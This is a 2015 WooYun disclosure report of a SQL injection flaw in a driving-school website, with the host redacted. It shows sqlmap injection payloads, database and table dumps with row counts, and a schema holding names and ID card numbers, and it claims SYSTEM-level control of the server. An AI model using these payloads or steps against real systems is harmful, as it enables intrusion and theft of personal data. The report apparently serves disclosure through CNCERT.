当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148081

漏洞标题:某驾校网某处注入漏洞(SA权限服务器)涉及60W用户重要信息(姓名\电话\身份证\住址等信息)

相关厂商:某驾校

漏洞作者: 路人甲

提交时间:2015-10-20 16:34

修复时间:2015-12-07 17:16

公开时间:2015-12-07 17:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-20: 细节已通知厂商并且等待厂商处理中
2015-10-23: 厂商已经确认,细节仅向厂商公开
2015-11-02: 细节向核心白帽子及相关领域专家公开
2015-11-12: 细节向普通白帽子公开
2015-11-22: 细节向实习白帽子公开
2015-12-07: 细节向公众公开

简要描述:

某驾校网某处注入漏洞(SA权限,服务器拿下)泄露60W信息(姓名,电话,身份证,住址等信息)

详细说明:

上海驾校网某处注入漏洞+SA权限(服务器已经沦陷),泄露60W重要信息(姓名,电话,身份证,住址等信息)。。。。。
权限是 : nt authority\system 服务器已经拿下,泄露重要信息。。。。。。。
链接:http://**.**.**.**/jgxx2.asp?id=9

sqlmap identified the following injection points with a total of 61 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=9 AND 6839=6839
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=9; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: id=9 AND 8384=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sy
s2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers
AS sys7)
---
[15:38:52] [INFO] testing Microsoft SQL Server
[15:38:53] [INFO] confirming Microsoft SQL Server
[15:38:54] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
available databases [18]:
[*] DTA
[*] ExamWeb
[*] ExamWebTest
[*] hpk
[*] hpk20130122
[*] HPK20130515
[*] hpk20130827
[*] hpk20150803
[*] hpksh
[*] jx
[*] master
[*] model
[*] msdb
[*] QPS
[*] RCMDVRServer
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
current user:    'sa'
current database:    'jx'
Database: jx
[110 tables]
+----------------------------+
| 091123                     |
| 2010061                    |
| 2014coach                  |
| BusinessUsers              |
| COACH                      |
| COACH_BAD_RECORD           |
| COACH_BAD_RECORD_2009      |
| COACH_BAD_RECORD_2010      |
| COACH_BAD_RECORD_ITEM      |
| COACH_BAD_RECORD_ITEM_2010 |
| COACH_BOARD                |
| COACH_BOARD_2013           |
| COACH_CHANGE               |
| COACH_CHANGE_his           |
| COACH_RE_EDUCATE           |
| COACH_temp2013             |
| COACH_temp2014             |
| CoachRe                    |
| D99_CMD                    |
| D99_REG                    |
| D99_Tmp                    |
| ExamQuestion               |
| JXRead                     |
| PriceBase                  |
| S3_Tmp                     |
| SubjectType                |
| TRAIN_UNIT_xh              |
| VIEW_091123                |
| VIEW_2006                  |
| VIEW_2007                  |
| VIEW_2008                  |
| VIEW_2009                  |
| VIEW_2010                  |
| VIEW_2011                  |
| VIEW_2012                  |
| VIEW_2013                  |
| View_2014                  |
| WZRY2014                   |
| YZ_COACH_HONESTY           |
| YZ_COACH_HONESTY_2009      |
| YZ_COACH_HONESTY_2010      |
| YZ_HONESTY_KIND            |
| YZ_HONESTY_KIND_2009       |
| YZ_TRAIN_UNIT              |
| YZ_TRAIN_UNIT22            |
| ZZ_SATISFY                 |
| ZZ_SATISFY_detail          |
| ZZ_suggest                 |
| YZ_HONESTY_KIND_20 0       |
| ZZ_suggest_te`p            |
| \x10bo.20140504coach       |
| hpknew.????????????-??
| hpknew.????????????-??
| hpknew.????????????--??
| hpknew.????????????-??
| jxre`dtmp                  |
| _zhaoxy                    |
| _zhaoxy_dir                |
| coach2009                  |
| coach2010                  |
| coach2012                  |
| coach20120605              |
| coach2013                  |
| coach20131017              |
| coach2014                  |
| coach2015                  |
| coach_2012                 |
| coach_2013                 |
| coach_2014                 |
| coach_bad_record_2011      |
| coach_board_2014           |
| coach_board_2015           |
| coach_imp_temp             |
| coach_level                |
| coach_level_2008           |
| coach_level_2009           |
| coach_level_2010           |
| coach_level_2011           |
| coach_level_temp           |
| coach_show                 |
| coach_show_his             |
| dtprnperties               |
| foofoofoo                  |
| jxpwd                      |
| jxpwd2                     |
| pangolin_test_tabl@        |
| price_private              |
| price_public               |
| pupil_dc1                  |
| pupil_fk                   |
| sqlmapoutput               |
| t_jiaozhu                  |
| tb_sign_up                 |
| tb_user                    |
| tb_wenda                   |
| tb_zcfg                    |
| train_unit                 |
| train_unit22               |
| train_unit_2010            |
| train_unit_honespy         |
| tszx_tab                   |
| veficle                    |
| vehicle201312              |
| vehicle_typ@               |
| yz_coach_honesty_2011      |
| zzPtrain_unit_temp         |
| hpknew.coach2011           |
| hpknew.coach2011temp       |
| hpknew.coach2011temp1      |
| hpknew.coachre2010         |
+----------------------------+


2.png


3.png


4.png


5.png


6.png


漏洞证明:

Database: jx
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| dbo.YZ_COACH_HONESTY           | 648180  |
| dbo.yz_coach_honesty_2011      | 543960  |
| dbo.YZ_COACH_HONESTY_2010      | 472729  |
| dbo.YZ_COACH_HONESTY_2009      | 328363  |
| dbo.COACH_BOARD                | 165593  |
| dbo.coach_board_2015           | 150608  |
| dbo.COACH_RE_EDUCATE           | 145770  |
| dbo.coach_board_2014           | 116794  |
| dbo.COACH_BOARD_2013           | 89046   |
| dbo.coach_level                | 79560   |
| dbo.coach_level_2011           | 57980   |
| dbo.coach_level_2010           | 39848   |
| dbo.CoachRe                    | 25813   |
| dbo.COACH                      | 25377   |
| dbo.coach_imp_temp             | 25377   |
| dbo.coach_2014                 | 24513   |
| dbo.COACH_temp2014             | 24513   |
| dbo.coach_level_2009           | 24033   |
| dbo.View_2014                  | 23951   |
| dbo.coach2014                  | 23688   |
| dbo.coach2015                  | 23688   |
| dbo.VIEW_2012                  | 22976   |
| dbo.VIEW_2013                  | 22721   |
| dbo.coach2013                  | 21852   |
| dbo.coach_level_temp           | 21580   |
| dbo.coach2012                  | 21306   |
| dbo.coach_2012                 | 20725   |
| dbo.coach_2013                 | 20592   |
| hpknew.coachre2010             | 19498   |
| dbo.VIEW_2011                  | 18787   |
| hpknew.coach2011temp1          | 18504   |
| hpknew.coach2011               | 18365   |
| hpknew.coach2011temp           | 18357   |
| dbo.coach20120605              | 18132   |
| dbo.coach2010                  | 16438   |
| dbo.VIEW_2010                  | 15979   |
| dbo.vehicle201312              | 15294   |
| dbo.coach2009                  | 14937   |
| dbo.VIEW_2008                  | 14843   |
| dbo.VIEW_2006                  | 14841   |
| dbo.VIEW_2007                  | 14839   |
| dbo.VIEW_091123                | 14837   |
| dbo.VIEW_2009                  | 14837   |
| dbo.ZZ_suggest                 | 9694    |
| dbo.coach20131017              | 9615    |
| dbo.coach_level_2008           | 9249    |
| dbo.coach_bad_record_2011      | 2884    |
| dbo.COACH_BAD_RECORD_2009      | 2673    |
| dbo.COACH_BAD_RECORD_2010      | 2536    |
| dbo.COACH_BAD_RECORD           | 2225    |
| dbo.ZZ_SATISFY_detail          | 1445    |
| dbo.ExamQuestion               | 1386    |
| dbo.pupil_dc1                  | 1185    |
| dbo.tb_sign_up                 | 1144    |
| dbo.tszx_tab                   | 747     |
| dbo.COACH_CHANGE_his           | 746     |
| dbo.PriceBase                  | 598     |
| dbo.WZRY2014                   | 590     |
| dbo.ZZ_SATISFY                 | 411     |
| dbo.coach_show_his             | 390     |
| dbo.COACH_CHANGE               | 332     |
| dbo.coach_show                 | 243     |
| dbo.YZ_TRAIN_UNIT              | 225     |
| dbo.train_unit22               | 220     |
| dbo.TRAIN_UNIT_xh              | 220     |
| dbo.jxpwd                      | 219     |
| dbo.train_unit                 | 219     |
| dbo.YZ_TRAIN_UNIT22            | 218     |
| dbo.BusinessUsers              | 210     |
| dbo.train_unit_2010            | 190     |
Database: jx
Table: YZ_COACH_HONESTY
[19 columns]
+---------------------------+------------------+
| Column                    | Type             |
+---------------------------+------------------+
| COACH_NO                  | varchar          |
| COACH_NO_NEW              | varchar          |
| H_MONTH                   | varchar          |
| H_SCORE                   | float            |
| H_YEAR                    | varchar          |
| HID                       | int              |
| HONESTY_COME_FROM         | varchar          |
| HONESTY_KIND              | varchar          |
| HONESTY_PERCENT           | float            |
| HONESTY_SUB_KIND_NAME     | varchar          |
| HONESTY_SUB_KIND_STANDARD | varchar          |
| id_card                   | varchar          |
| IS_SWAP                   | int              |
| MEMO                      | varchar          |
| NAME                      | varchar          |
| SUBMIT_DATE               | datetime         |
| TRAIN_UNIT_CODE           | varchar          |
| YZ_COACH_HONESTY_ID       | uniqueidentifier |
| YZ_HONESTY_KIND_ID        | varchar          |
+---------------------------+------------------+
名字、分数、年龄、教练序号、姓名、身份证号
敏感数据泄露,包括:姓名,电话,身份证,住址等信息
身份证、姓名、电话和住址
nt authority\system
????? DNS ?? . . . . . . . :
???? IPv6 ??. . . . . . . . : fe80::cdeb:4df4:5c
8b:8a01%14
IPv4 ?? . . . . . . . . . . . . : **.**.**.**
????  . . . . . . . . . . . . : **.**.**.**
????. . . . . . . . . . . . . : **.**.**.**
Pv6 ??. . . . . . . . : fe80::4961:92c2:6b16:b66f%13
IPv4 ?? . . . . . . . . . . . . : **.**.**.**10
????  . . . . . . . . . . . . : **.**.**.**
????. . . . . . . . . . . . . : **.**.**.**

78.png


7.png


8.png


9.png


88.png


修复方案:

你懂的

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-23 17:15

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给上海分中心,由其后续协调网站管理单位处置.

最新状态:

暂无

漏洞评价:

评论

  1. 2015-10-20 16:35 | HackPanda ( 普通白帽子 | Rank:117 漏洞数:16 | Talk is cheap,show me the shell.)

    是通用的那个驾校吗?

  2. 2015-10-20 16:36 | HackPanda ( 普通白帽子 | Rank:117 漏洞数:16 | Talk is cheap,show me the shell.)

    哦不是- -你报的不是通用。。